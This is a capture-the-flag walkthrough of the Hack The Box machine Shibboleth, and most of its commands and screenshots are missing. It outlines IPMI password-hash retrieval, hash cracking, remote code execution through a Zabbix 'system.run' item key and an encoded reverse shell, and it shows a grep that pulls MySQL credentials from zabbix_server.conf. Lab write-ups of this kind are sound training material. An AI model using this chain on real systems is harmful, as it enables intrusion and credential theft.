👁️Shibboleth
https://app.hackthebox.com/machines/410
After a quick nmap, we only find port 80 open, after a better look:
looking at the webserver:
We see some bootstrap, maybe this box has a CVE related exploit ->
we also are able to pull some possible usernames:
I also find at the end of the page some possible backend technologies that could be our entry point
in a previous scan, we noted that all pages that returned a 302 had 26 words so the --hw
flag is used to specify the header word to match in the response, in this case, it is set to 26
, which means the attack will stop when the response header contains the word 26
there is a zabbix subdomain, so it's probably the way to go, we need to add those in the etc/hosts file
a good thing to do after that is to launch a feroxbuster:
feroxbuster
, which is a tool for web application enumeration. The command is performing a directory bruteforce attack on the target URL http://shibboleth.htb
with the wordlist /usr/share/SecLists/Discovery/Web-Content/raft-medium-directories.txt
. The -w
flag is used to specify the wordlist file
nothing very interesting
The subdomains we found earlier all redirect to this page:
tried default creds but it did not work:
let's try to find other ways of going for the moment:
interesting, zabbix was maybe a rabbit hole
we can see that default port is 623, let's check:
We have to be extremly careful because when we type in this command:
but if we type in this command
the -sU
flag is used to specify the scan type as a UDP scan.
The target may be running a service on port 623
using the UDP protocol, but not using the TCP protocol.
The target may have a firewall configured to block incoming TCP connections on port 623
, but not UDP connections.
Let's follow the hacktricks methods to enumerate:
identify the version using:
the nmap made this output:
and the msfconsole:
I followed the IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval path and tried out this exploit:
I just had to set rhosts and it retrieved this:
now let's find the type of hash:
So the hashcat command would look like:
using the --user
flag because the hash starts with the username
We arrive on this dashboard:
after some enumeration, we find this:
Top right of the screen there is a create item button, let's see:
put whatever for the name and type system.run[id]
for the key
Then click the test button and the get value, it will output the id
command so we got a RCE
So we can try a reverse shell that we double encode to bypass any errors or special character problems:
Let's try only base64 for now:
It did not work, the fact that we have some + in the command bothers me so if we add some double spaces in between each one of the spaces:
so in the key parameter:
the final version of the payload was with port 443 so:
and the RCE parameter was:
set up a listener, click on test then get value:
we get some type of timeout
while looking through the documentation about how I could stabilize the shell or make a command that would create a new shell, we saw how the command system.run really works:
So if we have a timeout after waiting for the end of the execution, let's see with the nowait
parameter
I get a persistent shell but can't access the user.txt
after being a bit stuck, I saw that I was not logged in as the user who had the flag, so I tried to log in with the zabbix password found earlier and it worked:
after a bit of looking around, we found something that could be the way to go:
When you run the netstat -tnl
command, you will see a list of the current TCP and UDP connections on your system, along with their local and remote addresses and the state of the connections. This can be useful for identifying which processes are listening on which ports, and for troubleshooting network connectivity issues.
10050 and 10051 are Zabbix-related. 80 is the web stuff. 3306 is MySQL, which also supports Zabbix
So after looking around for possible MYSQL creds, I found this directory
the command cat zabbix_server.conf | grep -v "^#" | grep .
is used to display the non-comment, non-blank lines from the zabbix_server.conf
file. This can be useful for viewing the active configuration settings in the file.
grep -v "^#"
: The grep
command is used to search for and filter lines in the input. The -v
option is used to invert the search, so that only lines that do not match the specified pattern are displayed. The pattern "^#"
matches lines that begin with the #
character, which are typically used for comments in configuration files. This command filters out the lines that are comments, so that only the non-comment lines are displayed.
grep .
: The grep
command is used again to search for and filter lines in the input. The .
character is used as a pattern to match any non-empty line. This command filters out the blank lines, so that only the lines that contain text are displayed.
We found credentials -> let's try to connect to the mysql interface:
the shell does not give us anything it's pending, so I thought about upgrading it:
This command uses the Python interpreter to spawn a new Bash shell with a pseudo-terminal (PTY) attached to it. The PTY provides a more interactive and functional shell environment
it did not seem to work so i disconnected and came back to this normal shell:
and upgraded it using the standard script
trick:
do the switch user again and try connecting via MySQL
Let's see what's inside this databse:
In the Screenshot above we can see the version of the database, let's look that up ->
I'll go and follow the methodology ->
exit the DB to go back on the shell ->
and if you set up your listener earlier ->
the shell is ugly so let's see what we've learned earlier about making it better ->
once the shell is nice ->
Last updated